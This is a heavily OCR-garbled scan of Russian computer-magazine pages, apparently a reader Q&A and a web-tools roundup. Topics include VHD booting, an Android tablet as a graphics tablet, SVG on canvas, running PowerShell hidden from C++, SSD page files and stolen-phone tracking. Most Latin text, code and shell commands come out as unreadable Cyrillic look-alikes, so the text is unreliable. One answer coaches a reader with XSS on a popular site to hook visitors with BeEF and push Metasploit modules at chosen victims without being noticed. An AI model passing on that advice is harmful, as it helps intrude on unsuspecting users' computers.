была записана в УНО-файл, нужно пере- 
нести этот файл на целевой компью- 
тер. Как я уже упоминал, разместить его нужно 
не на системном диске. Теперь нужно примонти- 
ровать наш виртуальный жесткий диск так, чтобы 
он вел себя как реальный физический. Для этого 
воспользуемся оснасткой О!5К Мападетет 
(<\ММп + В> > Ч 5Ктап.т$с): выбираем из меню 
команду Асйоп —› АНасй \/НО и указываем наш 
УНО-файл. В результате ты должен увидеть 

в списке системных дисков \НО-диск. 
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Большой вопрос 


ПЛАНШЕТ ИЗ ПЛАНШЕТА 


Недавно прикупил себе планшет под управлением Апагоа (Са!аху Мое). 
Хочу заюзать его в качестве графического планшета. Это возможно? 


Есть два способа сделать это. Первый — использовать УМС. На машине запустить 

сервер, а на планшете — клиент (апагоа\МС, например), в настройках последнего 

выставить |пр\Мосае в «ТоиспМоиз$е; О-Рап Рап». Плюс данного подхода в его кросс- 
платформенности: /УМС-серверы есть для большинства ОС. Но это не совсем то, что тебе нужно, 
поскольку при таком подходе ты используешь планшет как мышь, а не как собственно планшет; 
кроме того, \/МС не передает данных о степени нажатия. Есть и другой, более продвинутый спо- 
соб, но для его работы нужны иксы, так что подойдет он только пользователям Ипих. Этот спо- 
соб основан на разработке пользователя СИНиБ’а с ником 1с2822 — СЫТаы в (ВИрз://аивиь. 
сот/11с2822/ОСтхТаШ®). Фишка заключается в связке Х.огд драйвера сетевого графического 
планшета и андроид-приложения, которое передает этому драйверу информацию. Примеча- 
тельно, что при таком подходе доступна информация и о степени нажатия, если, конечно, это 
поддерживается планшетом. Также андроид-приложение позволяет настроить ввод исклю- 
чительно с помощью стилуса, что очень удобно — можно спокойно держать руку на планшете. 
Установка СЁхТа Е предельно проста: 


$ е1Е с1опе ИЕрз: //в1ЕВиЬ. сот/гс2822 /бхТаб1е* . 21+ 
$ са афхТаб1е*/аг1уег-и1тприЕ 
$ таке 

. /лефмогКфаб1е* 


Если все прошло успешно, команда хтрщ 1${ должна показать наличие устройства Ме\могк 
Тае. После этого устанавливаем приложение из маркета (БИ.1у/ОтхТа!е?), подключаем план- 
шет кабелем к компьютеру (можно также через \М-Н[, в этом случае нужно указать !Р-адрес ком- 
пьютера в настройках приложения), запускаем и наслаждаемся. 


Теперь добавим запись для запуска 
системы с нашего \УНО в ВСО. Можно 


После выполнения скрипта перезагрузи 
компьютер и получишь запрос выбора 


сделать это вручную, но Ден Столтс 
из ТесиМ& написал небольшой Ба{-файл, 
который автоматизирует этот процесс. Возьми 
батник отсюда Ь(.1у/71Е!З3З и помести его в тотже 
каталог, куда положил \УНО-файл. 

Запусти ста от имени админа, перейди 
в папку с батником и выполни: 


АчцфоВоо*\УНО-ВСО. ста иМ1п7.\НО “"ити7\НО" 


ОС, одним из пунктов которого будет 
«\ММт7\/НО». Выбирай этот пункт, компьютер еще 
раз перезагрузится, но в этот раз вместо квадрат- 
ных окошек восьмерки ты увидишь давно знако- 
мый процесс загрузки М/паом/$ 7. Кстати, если 
что-то пошло не так и система с УНР не грузится, 
ты легко можешь вернуть все как было: для этого 
отмонтируй УМНО (Бащасп \НО), удали соответ- 
ствующую запись из ВСР и удали УНО-файл. 


742 Оп"Е5 


Не совсем хак, но кое-что есть. Дело в том, 

что хоть браузер на старых версиях Апагоа 
не поддерживает $\УС, но он поддерживает 
САМУ\УА$. Так что ты можешь отпарсить нужный 
тебе 5\/@-файл (так как внутренности его тексто- 
вые) и нарисовать его на канве. Конечно, парсер 
писать не придется, поскольку до нас это уже 
сделали: сапуд.|$ (со4е.аоое.сот/р/сапуа) или 


Рабис.]$ (ПИрз://айпиб.сот/кКапаахЛабнс.|$). 


Отображение $\@ для сапуд выглядит так: 


уаг 5% = 1оа4$у СОПЕ = "#сопе"); 
\аг сапуаз = Чдоситепт . сгеаеЕ1етеп*‹ + 
("сапуа5"); 

сапуа$ . зе АЕг1Бите ("5%у1е", "Пе1ей:" += 
+ сопе.Пе1ейе()+";мтаеИ:"+ соп®.мтаен() = 


ое 
сапув (сапуа$, $\%2); 
сопт . аррепа ( сапуаз) ; 


где функция юаа$\уд9 возвращает внутренности 
5\/@-файла в виде строки. 

Учти, что если на странице у тебя несколь- 
ко картинок, то такой способ вполне подойдет, 
но если их много, тогда нужно подумать о произ- 
водительности: возможно, лучше будет отказать- 
ся от5\/С. 


Собираюсь писать простенькую 20-игру 

для Апагоало$. Сейчас нахожусь в по- 
исках идеального движка: хочется максимум 
кросс-платформенности, при этом произво- 
дительность не особо важна, так как, повто- 
рюсь, игра простенькая. Пробовал сосо$2а, 
но он мне не очень понравился. Можешь поре- 
комендовать что-то еще? 

Если нужна максимальная  кросс- 

платформенность, то рекомендую посмо- 
треть в сторону свежего проекта Сате С!озиге 
(мимим/.аатес!озиге.сот). Особенность данного 
движка в том, что разработка ведется полно- 
стью на уауа$сирф, так что отлаживать проект 
можно прямо в браузере. После отладки прило- 
жения в браузере его можно скомпилировать 
в полноценные Апагогю- и Ю$-приложения (для 
Апаго! используется \8, а для 0$ — модифи- 
цированный Мо7Ша ЗЭраегМопкеу). Приложе- 
ния, созданные с помощью Сате Созиге, пол- 
ностью совместимы с Сооде Р1ау и Арр Зоге. 
Кроме того, Сате Созиге абсолютно беспла- 
тен, даже для коммерческого использования. 
Из минусов движка — официально доступен 
только для О$ Х, но можно установить 
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Сервис Апаго 1о${ получил информацию о местоположении смартфона 


и на Убити (подробнее здесь: пабгаваг.ги/ 
0$1/171999). 


Занимаюсь разработкой небольшой ути- 

литы под \М/Ипаом\м$ на С++. Хочу восполь- 
зоваться в ней возможностями Ромег$ Вей. Во- 
прос: как ВЫПОЛНЯТЬ из С++-кода 
Ромег-Пе!-команды и читать результат их вы- 
полнения, причем незаметно для пользовате- 
ля, то есть так, чтобы окно РомегЗНе! не от- 
крывалось? 

Можно, конечно, сделать это, но тебе при- 

дется использовать управляемый код, так 
как архитектура Ромег5Пе! основана исключи- 
тельно на объектной модели СИВ. Также нужно 
установить Ромег5пе! ОК (6и.1у/рз-заК) и доба- 
вить в зависимости твоего проекта учет. 
Мападетет.Ащотайопт.а! (находится в папке 
«{ргодгат Шез}\Ветегепсеа АззетЬ!ез\М!сгоз$ой\ 
\ММпаом/Ромиег5пе!\\1.0»). После описанных 
предварительных действий можно выполнять 
Ромегэпе!-команды прямо из С++-кода, напри- 
мер так: 


15112 памезрасе 5Зуз%ет: :Мапаретепе: : «= 
Ачтота*1оп; 


Ромег5йе11 р = Ромег$Ие11: :Сгеа*е(); <= 
рз->АдаСоттапа ( "веф-ргосе$5"); 


Наконец-то прикупил себе $$0. Учитывая ограниченность циклов 
перезаписи, я прямо пылинки с него сдуваю :). Так вот, стоит ли 
держать раде Ше на $$0, не укоротит ли это ему жизнь? 


Для чего ты покупал $50? Чтобы 
замедлять систему? Файл подкач- 
ки — идеальный кандидат для по- 
мещения на $50. Данные из файла 
подкачки значительно чаще 
считываются, чем записываются. 
А операции чтения практически 
никак не влияют на здоровье $$0. 


С другой стороны, перенос файла 
подкачки с 5$0 на другой диск 
действительно может положитель- 
но сказаться на жизни первого. 
Причина очевидна: убрав радеНе 

с $50, мы уменышаем количество 
операций записи на него, что прод- 
левает срок его службы. 


Со11есЕ1оп<Р5ОБЗес®> гез= р$5->ТпуокКе(); 
Фог (111 = 0; 1 < гез->Соип®; 1++ 
Соп5о1е: : Иг1еЕ1пте( 
ге$ [ 1 ] - >Метбег$ [ "Ргосез$Мате" ] - >«= 
\Ма1ие); 


Ва 


Подробнее о методах класса РомегЭПе! мож- 
но узнать по ссылке: БИ.1у/о$-тзап. 


Имеется Х$$ на достаточно посещаемом 

сайте, при этом очень много трафика 
идет с \Мпаом$ ХР. Хочу попробовать приме- 
нить кжертвам модули Меазрой, но неко всем 
сразу, а только к выбранным мной машинам, 
дабы не спалиться. Как проще сделать это? 

На твоем месте я бы заюзал Вгомзег 

ЕхроКайоп Егатем/огк (ВеЕР) (Бее!Трого ест. 
сот). Внедрив в уязвимую страницу небольшой 
скрипт, ты сможешь видеть информацию и управ- 
лять жертвами из веб-интерфейса. Поддержива- 
ется множество векторов атак: от социальной 
инженерии до эксплуатации уязвимостей брау- 
зеров. Тут, кстати, напомощь приходит Мщазр!оц, 
с которым ВеЕЕ тесно интегрирован. Все, 
что тебе нужно сделать, — это выбрать конкрет- 
ную жертву из списка и модуль для нее из катало- 
га Маазрюой. К сожалению, такой модуль, 
как Маазр!ой ащормт, не интегрирован в ВеЕР, 
но ничто не мешает получить ащормп ссылку 
от Мщазроц’а и потом внедрить ее жертве, ис- 
пользуя модуль «Стеае пмэе Игате». 


У меня украли смартфон с андроидом 
на борту. Никаких программ для отсле- 
живания аппарата на случай угона я предвари- 
тельно не установил. Но в маркете моя учетка 
до сих пор используется. Есть ли приложения, 
которые можно загрузить на смарт из маркета 
и узнать местоположение смарта? 
Рекомендую попробовать воспользоваться 
приложением Апагоа 10$ (БИ.1у/Апта0о${. 
Оно специально заточено под такие случаи. По- 
сле установки на девайс приложение нужно акти- 
вировать: есть шанс, что вор запустит его сам, так 
как оно маскируется под Регбопа| Моез. 
Но на всякий случай его можно активировать 
с помощью $М$ с текстом «апагоао${ гео ег». 
Для пользователей планшетов без поддержки 
5$М$ предусмотрен другой способ активации: 
нужно установить АпагоаЁо$ Чуитр$ай (6и.1у/ 
АпаЁо$ 5) перед установкой Апагога [0$1. = 
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Сервисы, позволяю- 
щие быстро сделать 
инфографикуи опу- 
бликоватьее в Сети 


ТУРЕ 2ЕвВвВА (уретеога.сот) 


—> Туре Реьга — это сервис для просмотра локальных шрифтов 
на примере верстки. Иными словами, он позволяет понять, 

как именно будет смотреться шрифт в заголовке, подзаголовке 
или основном тексте. Понятно, что это довольно тривиальная 
процедура и можно это делать, просто правя код или используя 
специальную программку для просмотра шрифтов, ноу Туре 
Гебга получается намного нагляднее и быстрее. Пока все про- 
сто, но разработчики обещают все важные функции: выбор 
оформления (цвет фона, жирное или курсивное начертание), 
возможность просмотра нескольких шрифтов сразу, а также 
систему пользовательских закладок и категорий шрифтов. 


пробовать оба сервиса. 


Туре ИеБга 
Бр: / /бурезеЬга.сот/ 


Туре 7еБга - это сервис дл 
локальных шрифтов на п 
Иными словами, он позвс 
именно будет смотреться 


Быстрый хак, позво- 
ляющий выкладывать 
файлы на Сооч!е Опуе 
по почте 


п а БазетепЕ зоте\мИеге 


\е доЁ э1сК о? мата 


ГМО не |031 {еаиге 


+Неге 5145 боод1е Ог1уе Геабиге гедиезЕ #452: 'Етол1 11125 +0 0 
+Не гедиезЕ м1 11 Бе гедтзсомегей апа 1трТетепеей. Виё ипЕТЛ Пе 


Зо ме БИК дгу.1о -а этре зеплсе {Па{ а|о\миз уоц {10 етай Тез эта 


ОВУ.1О (97/0) 


МООБЕВМОАЕ (ул. побеги. 1е/еп-из) 


—> Модет.1Е — это набор инструментов, которые проверяют 
страницу на совместимость с различными версиями 1Е. Мне 
просто интересно посмотреть на твою реакцию сейчас. Лад- 
но, если серьезно, то мне не надо тебе рассказывать, что у 1Е 
все еще треть рынка браузеров (в России, правда, 10%). 

И если ты зарабатываешь на жизнь версткой, окончательно 
отказаться от Е у тебя не получится. Моает.1Е предлагает 
различные исправления, но при этом учитывает, что вер- 
стаешь ты с помощью стандартных НТМЕ5, С$$3 и других 
«правильных» вещей. В общем, не волнуйся, ты сможешь 
спокойно спать по ночам. 
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|1МРОСВА.АМ ЛИЗА. [У (пгоог.ат/изиа! У) 


—> Думаю, не стоит рассказывать тебе, насколько популяр- 
на сейчас инфографика. Любой материал, в котором есть 
цифры, — хоть запись в блоге, хоть презентация твоей 
софтины или доклад на конференции — будет на порядок 
круче, если ты сможешь наглядно представить данные. По- 
этому сервис штодг.ат подойдет как нельзя лучше — в нем 
есть шаблоны и элементы, позволяющие сделать довольно 
крутую графику. Правда, в этом сервисе инфографику нель- 
зя экспортировать в файл, он позволяет только расшарить 
ее в социалках или заембеддить в веб-страничку. Такие 
возможности есть у более сложного \М!зиа!.1у — советую по- 


Средство просмотра 
системных шрифтов 

в браузеренапримере 
реального или рыбного 
текста 


—> Сервис, решающий простую задачу: он позволяет от- 
правлять файлы в гуглдрайв по почте. Как пишут сами раз- 
работчики большими буквами на своей странице: «Мы устали 
ждать, когда это сделает Соод6». И наваяли то, что им было 
нужно, — как настоящие джедаи. К сожалению, сервис не под- 
держивает файлы больше 7 мегабайт. Но главную свою задачу 
сервис выполняет — можно загрузить файл в конкретную папку 
(правда, папка должна быть предварительно создана серви- 
сом, ане из самого Соод!е Огуе, но разработчики обещают это 
исправить). В общем, до тех пор, пока СоодЕе не сделает то, 
что от него ждут, этот сервис сможет выручить. 


М!сго$о Е надеется хоть 
как-то загладить свою 
винуза[Еб 


